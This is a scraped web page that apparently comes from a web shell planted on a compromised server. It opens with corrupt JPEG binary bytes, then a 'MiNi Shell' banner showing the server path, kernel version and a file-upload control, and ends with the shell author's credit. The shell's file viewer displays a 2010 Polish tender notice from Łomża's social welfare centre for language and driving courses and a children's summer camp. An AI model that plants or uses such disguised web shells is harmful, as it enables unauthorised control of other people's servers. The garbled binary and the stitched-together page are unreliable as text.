JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100714/208132-N-2010.html

<p class="kh_header"><b>Łomża: przeprowadzenie szkoleń oraz zorganizowanie kolonii letnich dla dzieci i młodzieży z terenu miasta Łomży</b><br>
<b>Numer ogłoszenia: 208132 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łomży , ul. Dworna 23B, 18-400 Łomża, woj. podlaskie, tel. 086 2164088, 2164260, faks 086 2165851.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomza.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie szkoleń oraz zorganizowanie kolonii letnich dla dzieci i młodzieży z terenu miasta Łomży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na trzy części:

Część 1: Zorganizowanie i przeprowadzenie kursu języka angielskiego na poziomie podstawowym metodą Callana 26 osób w wymiarze 60 godzin szkoleniowych. 

Wymagania: salę zapewnia wykonawca; wykładowca - wykształcenie wyższe magisterskie w zakresie filologii angielskiej, uprawnienia pedagogiczne, udokumentowane doświadczenie  w zawodzie nauczyciela ,lektora, wykładowcy języka angielskiego nie mniej niż 5 lat. Wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs. 

Kurs powinien być zorientowany na praktyczne wykorzystanie poznawanego języka w konkretnych sytuacjach życiowych. Beneficjenci powinni być zmotywowani do prowadzenia rozmów zainspirowanych aktualnymi wydarzeniami. Zajęcia powinny umożliwić nabycie biegłości i śmiałości mówienia w języku obcym. Wykładowca powinien zachęcić do opowiadania o swoich pasjach, celach i potrzebach. 

Beneficjenci powinni w równym stopniu poznać i udoskonalić wszystkie sprawności językowe: mówienie i rozumienie ze słuchu, gramatykę, czytanie oraz pisanie. Podczas zajęć systematycznie powinna być pogłębiana wiedza naszych słuchaczy, która wzbogaci ich słownictwo oraz utrwali struktury gramatyczne. Na zajęciach, oprócz pracy z podręcznikiem, powinny być wykorzystywane materiały audio-video oraz materiały oryginalne, takie jak wycinki prasowe, wiadomości z Internetu, programy telewizyjne czy filmy w wersji oryginalnej.
Tematyka kursu oprócz przełamywania bariery językowej  powinna umożliwić poszerzanie horyzontów beneficjentów, rozbudzić  ciekawość w poznawaniu świata oraz zachęcić do nauki języka angielskiego, ukazać celowość jego poznawania.

W celu wyłonienia najlepszej oferty wykonawca powinien przedstawić program kursu uwzględniający powyższe wymagania. 

Po zakończeniu kursu wykonawca będzie zobowiązany do wydania zaświadczenia o ukończeniu szkolenia dla uczestników szkolenia (oryginał) oraz kopii, poświadczonej za zgodność z oryginałem  dla MOPS w Łomży. Zaświadczenie o ukończeniu szkolenia musi zawierać następujące informacje : imię i nazwisko uczestnika szkolenia, datę szkolenia, liczbę godzin szkolenia, zakres w jakim uczestnik szkolenia został przeszkolony, nazwę wykonawcy, podpisy prowadzących. 

Wykonawca zobowiązany będzie do umieszczenia na zaświadczeniach o ukończeniu szkolenia poniższej informacji: Szkolenie w ramach projektu systemowego współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL, Priorytet VII - Promocja Integracji Społecznej. Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji. Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Miejski Ośrodek Pomocy Społecznej w Łomży. 

Część 2: Szkolenie przygotowujące do egzaminu na prawo jazdy kategorii B dla 25 osób oraz na prawo jazdy kategorii C dla 4 osób.  
 
Wymagania: 
1.	Cena badań lekarskich, testów psychotechnicznych,  przed rozpoczęciem kat B i C , szkolenia w zakresie przewozu towarów dla kat. C oraz egzaminu państwowego dla wszystkich kategorii ujęta w koszcie szkolenia ,w cenie oferty,. Badania lekarskie i testy psychotechniczne mają rozpocząć się w dniu rozpoczęcia szkolenia, zapewnione przez Wykonawcę dla uczestników szkolenia: Badania lekarskie przeprowadzone przez lekarza medycyny pracy. Badania mają na celu stwierdzenie zdolności do odbycia szkolenia oraz podjęcia zatrudnienia zgodnego z kierunkiem odbytego szkolenia. Badania lekarskie niezbędne do wydania orzeczenia lekarskiego na podstawie art. 122 ust. 1 pkt 1 Ustawy Prawo o ruchu drogowym z dnia 20.06.1997r. ,t.j. Dz. U. z 2005r., nr 108, poz. 908 ze zm.,. 
2.	Uczestnicy szkolenia muszą być ubezpieczeni od następstw nieszczęśliwych wypadków od dnia rozpoczęcia szkolenia do dnia zakończenia szkolenia ,koszt ubezpieczenia musi być ujęty w koszcie szkolenia - w cenie oferty,. 
3.	Wykonawca będzie przyjmował pojedyncze osoby w ramach szkoleń indywidualnych lub grupę osób w ramach szkoleń grupowych - skierowane na kurs przez Zamawiającego. 
4.	Zajęcia teoretyczne muszą odbywać się od poniedziałku do piątku, nie więcej niż 6 godzin zegarowych dziennie ,łącznie z przewidzianymi przerwami,. Zajęcia praktyczne ,w tym na placu manewrowym, muszą odbywać się od poniedziałku do soboty, nie więcej niż 3 godziny zegarowe dziennie. 
5.	Pojazdy mechaniczne na których będzie prowadzone szkolenie musza być w pełni sprawne technicznie. W przypadku awarii wskazanego w ofercie pojazdu, Wykonawca na okres naprawy zapewni samochód zastępczy. 
6.	W cenie oferty muszą być ujęte materiały szkoleniowe: zbindowany skrypt lub książka, notatnik, długopis - jakie przekazane zostaną na własność każdemu uczestnikowi szkolenia. Materiały szkoleniowe powinny dotyczyć ściśle tematyki szkolenia, a więc danej kategorii prawa jazdy. Materiały powinny mieć formę co najmniej papierową. W materiałach szkoleniowych przekazywanych uczestnikom szkolenia znajdować się będą aktualne przepisy prawa o ruchu drogowym, w tym wyjaśnienia oznaczeń poszczególnych znaków drogowych, czy też graficzne rozrysowanie zasad ruchu drogowego obowiązujących m.in. na tzw. ,krzyżówkach, ,zasady pierwszeństwa, etc,.
7.	Ukończenie szkolenia zostanie potwierdzone stosownym zaświadczeniem, zgodnie z obowiązującymi w tym zakresie przepisami prawa. Na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć i wypełniana każdorazowo w dniu szkolenia, zgodnie z programem szkolenia. Absolwent kursu powinien ponadto posiadać wiadomości w zakresie bezpiecznego kierowania pojazdem, przepisów dot. czasu pracy kierowców, dokumentów wymaganych w krajowym i międzynarodowym przewozie osób i towarów, planowania trasy przejazdu, czytania map drogowych, jak również warunków bezpieczeństwa związanych z załadunkiem i rozładunkiem. 
8.	W ramach kursu wykonawca ponosi koszt: wszystkich niezbędnych badań lekarskich i testów psychotechnicznych wymaganych powszechnie obowiązującymi przepisami prawa, jakie musi przejść każda szkolona osoba, koszt kursu teoretycznego dla danej kategorii, koszt kursu praktycznego dla danej kategorii, koszt szkolenia z przewozu towarów dla Kat. C, koszt egzaminu wewnętrznego przeprowadzanego u wykonawcy, pierwszego podejścia absolwenta kursu do egzaminu państwowego, koszt materiałów szkoleniowych dla każdego uczestnika kursu. Powyższe koszty powinny być wkalkulowane w cenę oferty. 
9.	Wykonawca zobowiązany będzie do bieżącego prowadzenia w trakcie szkolenia listy obecności uczestników oraz przedstawiania kopii tej listy Zamawiającemu w terminie 3 dni od zakończeniu szkolenia. 
10.	Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu wewnętrznego, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji. Na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć i wypełniana codziennie, zgodnie z programem szkolenia. Po ukończeniu szkolenia, nie później niż w terminie 3 dni, zostanie przekazana zamawiającemu. 
11.	Zamawiający zastrzega sobie prawo do przeprowadzania kontroli efektywności i prawidłowości szkolenia zgodnie z obowiązującym w tym zakresie przepisami i na warunkach określonych w umowie. Ponadto Zamawiający zastrzega sobie prawo do kontroli frekwencji uczestników, jak też prawo wglądu do dokumentów, w tym finansowych, związanych z realizacją niniejszej umowy. 
12.	Zamawiający nie ponosi kosztów szkolenia osób, które w trakcie szkolenia zostaną z przyczyn leżących po stronie Wykonawcy skreślone z listy uczestników. 

Po zakończeniu szkolenia wykonawca będzie zobowiązany do wydania zaświadczenia o ukończeniu szkolenia dla uczestników szkolenia ,oryginał, oraz kopii, poświadczonej za zgodność z oryginałem  dla MOPS w Łomży. Zaświadczenie o ukończeniu szkolenia musi zawierać następujące informacje : imię i nazwisko uczestnika szkolenia, datę szkolenia, liczbę godzin szkolenia, zakres w jakim uczestnik szkolenia został przeszkolony, nazwę wykonawcy, podpisy prowadzących. 

Wykonawca zobowiązany będzie do umieszczenia na zaświadczeniach o ukończeniu szkolenia poniższej informacji: Szkolenie w ramach projektu systemowego współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL, Priorytet VII - Promocja Integracji Społecznej. Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji. Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Miejski Ośrodek Pomocy Społecznej w Łomży. 

Część 3: Zorganizowanie kolonii letnich dla dzieci i młodzieży ze szkół podstawowych i gimnazjów ,wiek od 7 do 16 lat, z terenu miasta Łomża. 

Wymagania: 
1.	Zakwaterowanie 37 dzieci ,wiek 7-16 lat, podczas 14 - dniowego turnusu w miejscowości nadmorskiej w dniach między 10-24-08-2010 w budynkach murowanych, w pokojach maksymalnie 4 osobowych, dostępny w budynku węzeł sanitarny wyposażony w natryski i WC. Woda ciepła bez ograniczeń. Przez 14 dniowy  turnus należy rozumieć: kolacja -dzień pierwszy, pobyt ,12 noclegów , 12 dni z całodziennym wyżywieniem, śniadanie i prowiant na drogę dzień ostatni. 
2.	Obiekt kolonijny nie może być oddalony od morza więcej niż około 1000 metrów. 
3.	 Zapewnienie całodziennego wyżywienia ,4 posiłki dziennie: śniadanie, obiad, kolacja oraz drugie śniadanie lub podwieczorek,. Dzienna stawka na dziecko nie może być niższa niż 35zł. Zapewnienie wartości kalorycznej i odżywczej posiłków wydawanych dzieciom i młodzieży zgodnie z normami Instytutu Żywności i Żywienia w Warszawie oraz odpowiedniego stanu sanitarno - technicznego. 
4.	Zagwarantowanie dostępności do obiektów  sportowych, świetlic oraz innych obiektów kulturalno -sportowych znajdujących się na terenie ośrodka. 
5.	Zapewnienie całodobowej opieki lekarskiej i pielęgniarskiej. 
6.	Zapewnienie odpowiedniego programu atrakcji ,dwie wycieczki w atrakcyjne miejsce,. 
7.	Zapewnienie opieki wykwalifikowanej kadry oraz nadzoru ratownika nad dziećmi korzystającymi z kąpieli na strzeżonych kąpieliskach i na basenie. 
8.	Zapewnienie uczestnikom kolonii transportu w ciągu dnia z Łomży do ośrodka kolonijnego i z powrotem autokarami z klimatyzacją oraz odpowiedniej  liczby opiekunów podczas podróży. 
9.	Ubezpieczenie uczestników kolonii od następstw nieszczęśliwych wypadków NW  do sumy ubezpieczenia  nie mniejszej niż 10.000zł na czas przejazdów i pobytu. 
10.	Posiadanie przez Wykonawcę ubezpieczenia w zakresie odpowiedzialności  cywilnej OC na kwotę co najmniej  100 000.zł. 
11.	Wykonawca zapewni transport na swój koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.58.00.00-3, 55.24.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki: 

1.	Spełniają warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych.  
2.	Wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej trzy zamówienia /w odniesieniu do szkoleń szkolenia a w odniesieniu do kolonii wypoczynek dla dzieci i młodzieży/ potwierdzające posiadanie wiedzy i doświadczenia niezbędnego do wykonania zamówienia.  
3.	Dysponują osobami, które posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia.  
4.	Dysponują ośrodkiem szkoleniowym lub salami szkoleniowymi umożliwiającymi wykonanie zamówienia a w odniesieniu do kolonii ośrodkiem wypoczynkowym, spełniającym wymagania określone w przedmiocie zamówienia. 
5.	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000 złotych. 

Ocena spełniania wymaganych warunków udziału w postępowaniu dokonana zostanie wg. kryterium spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty wymienionych w pkt 3 siwz. 

Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, potencjale technicznym oraz sytuacji ekonomicznej i finansowej innego podmiotu, niezależnie od charakteru prawnego łączącego go z tym podmiotami. W takiej sytuacji wykonawca zobowiązany jest przedstawić pisemne zobowiązanie innych podmiotów lub inny dokument wykazujący i potwierdzający, że będzie mógł korzystać z zasobów tych podmiotów w okresie wykonywania zamówienia stanowiącego przedmiot postępowania oraz, że postawiony warunek jest spełniony. 


3. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykaz dokumentów i oświadczeń wskazujących na brak podstaw do wykluczenia z postępowania. 

Na potwierdzenie spełniania warunków udziału w postępowaniu należy do oferty załączyć następujące dokumenty i oświadczenia: 

1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w ustawie Prawo zamówień publicznych oraz w specyfikacji istotnych warunków zamówienia, zgodnie z art. 44 ustawy Prawo zamówień publicznych - załącznik nr 2. 
2.	Wykaz zamówień wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy, w tym czasie, potwierdzający posiadanie wiedzy i doświadczenia w zakresie niezbędnym do wykonania zamówienia będącego przedmiotem niniejszego postępowania, w tym co najmniej 3 zamówień z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i odbiorców i załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie - zgodnie z załącznikiem nr 3 do siwz. 
3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat posiadanych kwalifikacji, uprawnień i doświadczenia w zakresie objętym przedmiotem zamówienia oraz informacją o podstawie dysponowania tymi osobami - zgodnie z załącznikiem nr 4 do siwz. 
4.	Oświadczenie wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia do wykonywania zawodów potrzebnych do wykonania zamówienia. 
5.	Informację o ośrodku szkoleniowym lub salach szkoleniowych, ośrodku wypoczynkowym, w których wykonawca zamierza wykonać zamówienie wraz z informacją o podstawie do dysponowania tymi salami lub ośrodkiem. 
6.	Opłaconą polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, co najmniej na kwotę 100.000 złotych. 
7.	Pisemne zobowiązanie innych podmiotów lub inny dokument wykazujący i potwierdzający, że wykonawca będzie korzystać z zasobów tych podmiotów w okresie wykonywania zamówienia stanowiącego przedmiot postępowania i, że warunek w tym zakresie jest spełniony.


W celu potwierdzenia braku podstaw do wykluczenia z postępowania o udzielenie zamówienia do oferty należy załączyć następujące dokumenty i oświadczenia: 

1.	Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5.  
2.	Aktualny odpis z właściwego rejestru wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych. 
3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

Jeżeli spełnienie warunków udziału w postępowaniu będzie opierało się na korzystaniu z zasobów innych podmiotów a jednocześnie podmioty te będą uczestniczyły w realizacji części zamówienia, podmioty te zobowiązane są złożyć dokumenty wymienione w punktach od 1 do 4, wskazujące brak podstaw do wykluczenia z postępowania.  


Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych wyżej, wykonawca składa dokumenty i oświadczenia zgodnie z § 4 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. 

Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku korzystania z zasobów innych podmiotów, kopie dokumentów dotyczące odpowiednio wykonawcy lub podmiotu są potwierdzane za zgodność z oryginałem przez wykonawcę lub podmiot. 


4, Wykonawcy wspólnie ubiegający się o zamówienie. 

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
Obowiązkiem wykonawców wspólnie ubiegających się o udzielenie zamówienia jest ustanowienie pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie udzielenia zamówienia.
Zamawiający może żądać od wykonawców wspólnie ubiegających się o udzielenie zamówienia, umowy regulującej ich współpracę a w przypadku uznania ich oferty za najkorzystniejszą dostarczenie takiej umowy jest obligatoryjne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lomza.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łomży, ul. Dworna 23B 
18 - 400 Łomża, w sekretariacie w godzinach od 7:30 do 15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łomży, ul. Dworna 23B 
18 - 400 Łomża, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przeprowadzenie szkoleń i zorganizowanie kolonii letnich dla dzieci i młodzieży ze szkól podstawowych i gimnazjalnych z terenu miasta Łomża w ramach projektu systemowego ,EFS - Nowa droga do sukcesu, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com